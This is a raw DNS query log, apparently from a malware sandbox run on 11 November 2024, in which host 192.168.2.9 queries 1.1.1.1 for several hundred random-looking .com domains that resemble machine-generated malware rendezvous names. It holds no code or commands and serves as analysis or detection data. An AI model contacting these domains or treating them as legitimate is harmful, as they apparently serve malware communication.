                                                                                                                                                                                                            Nov 11, 2024 18:07:53.401845932 CET192.168.2.91.1.1.10x56f8Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.402070045 CET192.168.2.91.1.1.10x106fStandard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.402195930 CET192.168.2.91.1.1.10x2e80Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.403614044 CET192.168.2.91.1.1.10x7f33Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.403973103 CET192.168.2.91.1.1.10x3cfeStandard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.404150009 CET192.168.2.91.1.1.10x8489Standard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.404512882 CET192.168.2.91.1.1.10x8ab3Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.404512882 CET192.168.2.91.1.1.10xcce4Standard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.434185028 CET192.168.2.91.1.1.10x523Standard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.435784101 CET192.168.2.91.1.1.10x94bcStandard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.435784101 CET192.168.2.91.1.1.10x5d36Standard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.436158895 CET192.168.2.91.1.1.10x3323Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.436158895 CET192.168.2.91.1.1.10x60a6Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.436913967 CET192.168.2.91.1.1.10xc9fdStandard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.436913967 CET192.168.2.91.1.1.10xf9c4Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.437123060 CET192.168.2.91.1.1.10x69f8Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.437341928 CET192.168.2.91.1.1.10x343aStandard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.437539101 CET192.168.2.91.1.1.10x9723Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.437720060 CET192.168.2.91.1.1.10xa9b7Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.437720060 CET192.168.2.91.1.1.10xdc6eStandard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.437947035 CET192.168.2.91.1.1.10xffbaStandard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.438143015 CET192.168.2.91.1.1.10x4c1aStandard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.438143015 CET192.168.2.91.1.1.10xdadStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.438339949 CET192.168.2.91.1.1.10x10e2Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.439420938 CET192.168.2.91.1.1.10x45b2Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.463339090 CET192.168.2.91.1.1.10x659cStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.886495113 CET192.168.2.91.1.1.10x5b85Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.886495113 CET192.168.2.91.1.1.10xbd71Standard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.886764050 CET192.168.2.91.1.1.10x3c92Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.888612986 CET192.168.2.91.1.1.10x777eStandard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.889014006 CET192.168.2.91.1.1.10x2b74Standard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.890645981 CET192.168.2.91.1.1.10x59d8Standard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.890645981 CET192.168.2.91.1.1.10x2018Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.890954018 CET192.168.2.91.1.1.10xefaStandard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.891407967 CET192.168.2.91.1.1.10xcc49Standard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.893213987 CET192.168.2.91.1.1.10x5aaeStandard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.893975019 CET192.168.2.91.1.1.10xd0d4Standard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.894732952 CET192.168.2.91.1.1.10x8e3Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.895515919 CET192.168.2.91.1.1.10xfef0Standard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.895821095 CET192.168.2.91.1.1.10xbfebStandard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.898427963 CET192.168.2.91.1.1.10x46e3Standard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.898427963 CET192.168.2.91.1.1.10x855dStandard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.898602009 CET192.168.2.91.1.1.10x36b6Standard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.900242090 CET192.168.2.91.1.1.10xbe96Standard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.900343895 CET192.168.2.91.1.1.10xf506Standard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.901647091 CET192.168.2.91.1.1.10x23ffStandard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.917104006 CET192.168.2.91.1.1.10x9b0cStandard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.919317961 CET192.168.2.91.1.1.10x9519Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.919317961 CET192.168.2.91.1.1.10x940eStandard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.920629978 CET192.168.2.91.1.1.10xd8c0Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.920864105 CET192.168.2.91.1.1.10x25deStandard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.920957088 CET192.168.2.91.1.1.10x89c1Standard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.921051025 CET192.168.2.91.1.1.10xf1d3Standard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.921452999 CET192.168.2.91.1.1.10x12deStandard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.921452999 CET192.168.2.91.1.1.10xabcStandard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.921652079 CET192.168.2.91.1.1.10x284eStandard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.921652079 CET192.168.2.91.1.1.10x1c78Standard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.921807051 CET192.168.2.91.1.1.10x8076Standard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.922195911 CET192.168.2.91.1.1.10xc911Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.928278923 CET192.168.2.91.1.1.10xabe6Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.937100887 CET192.168.2.91.1.1.10x52ccStandard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.947357893 CET192.168.2.91.1.1.10xa742Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.947357893 CET192.168.2.91.1.1.10x6394Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.947921991 CET192.168.2.91.1.1.10xbb8fStandard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.874290943 CET192.168.2.91.1.1.10x29f7Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.874577999 CET192.168.2.91.1.1.10xebf6Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.893274069 CET192.168.2.91.1.1.10xa3dbStandard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.893455029 CET192.168.2.91.1.1.10x3fdbStandard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.893631935 CET192.168.2.91.1.1.10x3c37Standard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.893810034 CET192.168.2.91.1.1.10xb6afStandard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.894004107 CET192.168.2.91.1.1.10xe351Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.894154072 CET192.168.2.91.1.1.10x853eStandard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.894325972 CET192.168.2.91.1.1.10xb592Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.894454956 CET192.168.2.91.1.1.10xd7d0Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.899431944 CET192.168.2.91.1.1.10x1c7bStandard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.899609089 CET192.168.2.91.1.1.10xb098Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.901076078 CET192.168.2.91.1.1.10x615eStandard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.901757002 CET192.168.2.91.1.1.10xa649Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.903469086 CET192.168.2.91.1.1.10x6fb3Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.903667927 CET192.168.2.91.1.1.10x91ceStandard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.918555975 CET192.168.2.91.1.1.10x9623Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.919701099 CET192.168.2.91.1.1.10x8c3aStandard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.920115948 CET192.168.2.91.1.1.10x10b5Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.920309067 CET192.168.2.91.1.1.10xdf95Standard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.920720100 CET192.168.2.91.1.1.10x5684Standard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.920793056 CET192.168.2.91.1.1.10xc5d2Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.920922995 CET192.168.2.91.1.1.10xabadStandard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.921042919 CET192.168.2.91.1.1.10xf873Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.921124935 CET192.168.2.91.1.1.10xce06Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.921258926 CET192.168.2.91.1.1.10x73e9Standard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.921416044 CET192.168.2.91.1.1.10x5e74Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.931766987 CET192.168.2.91.1.1.10x9583Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.932930946 CET192.168.2.91.1.1.10x48ceStandard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.938009024 CET192.168.2.91.1.1.10xf559Standard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.938201904 CET192.168.2.91.1.1.10x9de5Standard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.938566923 CET192.168.2.91.1.1.10xce03Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.938729048 CET192.168.2.91.1.1.10xd761Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.938760996 CET192.168.2.91.1.1.10x4012Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.938925982 CET192.168.2.91.1.1.10xd7f2Standard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.938960075 CET192.168.2.91.1.1.10x9cb2Standard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.939332962 CET192.168.2.91.1.1.10x9f2eStandard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.941978931 CET192.168.2.91.1.1.10x31cfStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.955652952 CET192.168.2.91.1.1.10x6b35Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.955753088 CET192.168.2.91.1.1.10x96bfStandard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.411494970 CET192.168.2.91.1.1.10x3a31Standard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.412847996 CET192.168.2.91.1.1.10x6075Standard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.413875103 CET192.168.2.91.1.1.10x2e40Standard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.421739101 CET192.168.2.91.1.1.10xebbbStandard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.422941923 CET192.168.2.91.1.1.10x76cdStandard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.424540043 CET192.168.2.91.1.1.10xf28cStandard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.425004959 CET192.168.2.91.1.1.10x7889Standard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.425671101 CET192.168.2.91.1.1.10x658eStandard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.426398039 CET192.168.2.91.1.1.10xd024Standard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.427052021 CET192.168.2.91.1.1.10x6e1fStandard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.427570105 CET192.168.2.91.1.1.10xa589Standard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.428097010 CET192.168.2.91.1.1.10x647eStandard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.428797007 CET192.168.2.91.1.1.10xb146Standard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.429337025 CET192.168.2.91.1.1.10xac0fStandard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.429379940 CET192.168.2.91.1.1.10xdb82Standard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.429894924 CET192.168.2.91.1.1.10xbd8dStandard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.429970980 CET192.168.2.91.1.1.10x29faStandard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.430974960 CET192.168.2.91.1.1.10x2db9Standard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.434205055 CET192.168.2.91.1.1.10x6040Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.435168982 CET192.168.2.91.1.1.10xa7cfStandard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.435513973 CET192.168.2.91.1.1.10xcfc3Standard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.454256058 CET192.168.2.91.1.1.10xcc4fStandard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.469618082 CET192.168.2.91.1.1.10xc2b0Standard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.471266985 CET192.168.2.91.1.1.10xb744Standard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.481117964 CET192.168.2.91.1.1.10x9dfbStandard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.539242983 CET192.168.2.91.1.1.10xaf7eStandard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.539644003 CET192.168.2.91.1.1.10xed84Standard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.539711952 CET192.168.2.91.1.1.10xc9fcStandard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.540179014 CET192.168.2.91.1.1.10xce16Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.540366888 CET192.168.2.91.1.1.10x475fStandard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.540724039 CET192.168.2.91.1.1.10x5de2Standard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.541100025 CET192.168.2.91.1.1.10xe58eStandard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.541176081 CET192.168.2.91.1.1.10x638dStandard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.541547060 CET192.168.2.91.1.1.10x475eStandard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.541795015 CET192.168.2.91.1.1.10xebe4Standard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.542022943 CET192.168.2.91.1.1.10x3c82Standard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.542318106 CET192.168.2.91.1.1.10x604fStandard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.543262005 CET192.168.2.91.1.1.10xe390Standard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.543765068 CET192.168.2.91.1.1.10xf5fcStandard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.551003933 CET192.168.2.91.1.1.10x1c77Standard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.552442074 CET192.168.2.91.1.1.10x5bbfStandard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.558511972 CET192.168.2.91.1.1.10x1d41Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.558762074 CET192.168.2.91.1.1.10x5567Standard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.558952093 CET192.168.2.91.1.1.10xe819Standard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.559422016 CET192.168.2.91.1.1.10xb1aeStandard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:56.559609890 CET192.168.2.91.1.1.10x93eStandard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.418252945 CET192.168.2.91.1.1.10xda9aStandard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.418649912 CET192.168.2.91.1.1.10x9b78Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.419029951 CET192.168.2.91.1.1.10x3680Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.419234037 CET192.168.2.91.1.1.10xd822Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.419661999 CET192.168.2.91.1.1.10x774dStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.419841051 CET192.168.2.91.1.1.10x6ea0Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.420139074 CET192.168.2.91.1.1.10xb434Standard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.420382977 CET192.168.2.91.1.1.10xfa5cStandard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.437679052 CET192.168.2.91.1.1.10xfac7Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.439383984 CET192.168.2.91.1.1.10x9fadStandard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.441468954 CET192.168.2.91.1.1.10x2fc9Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.442234993 CET192.168.2.91.1.1.10xdfe4Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.442511082 CET192.168.2.91.1.1.10x1ca1Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.444205999 CET192.168.2.91.1.1.10xd07bStandard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.444431067 CET192.168.2.91.1.1.10x2fa3Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.446151018 CET192.168.2.91.1.1.10x948aStandard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.446197033 CET192.168.2.91.1.1.10x65ebStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.448555946 CET192.168.2.91.1.1.10x5117Standard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.448947906 CET192.168.2.91.1.1.10xa0b4Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.471236944 CET192.168.2.91.1.1.10xc336Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.471453905 CET192.168.2.91.1.1.10x4a6dStandard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.486885071 CET192.168.2.91.1.1.10xd355Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.558743954 CET192.168.2.91.1.1.10x25c2Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.564609051 CET192.168.2.91.1.1.10xc58fStandard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.566030979 CET192.168.2.91.1.1.10xb39eStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.567209959 CET192.168.2.91.1.1.10xf58cStandard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.598475933 CET192.168.2.91.1.1.10xf5c1Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.612736940 CET192.168.2.91.1.1.10xdbaaStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.646879911 CET192.168.2.91.1.1.10xea23Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.647578955 CET192.168.2.91.1.1.10x3f3cStandard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.647910118 CET192.168.2.91.1.1.10xfd81Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.649194002 CET192.168.2.91.1.1.10x9a97Standard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.980536938 CET192.168.2.91.1.1.10x9de9Standard query (0)lysysir.comA (IP address)IN (0x0001)false
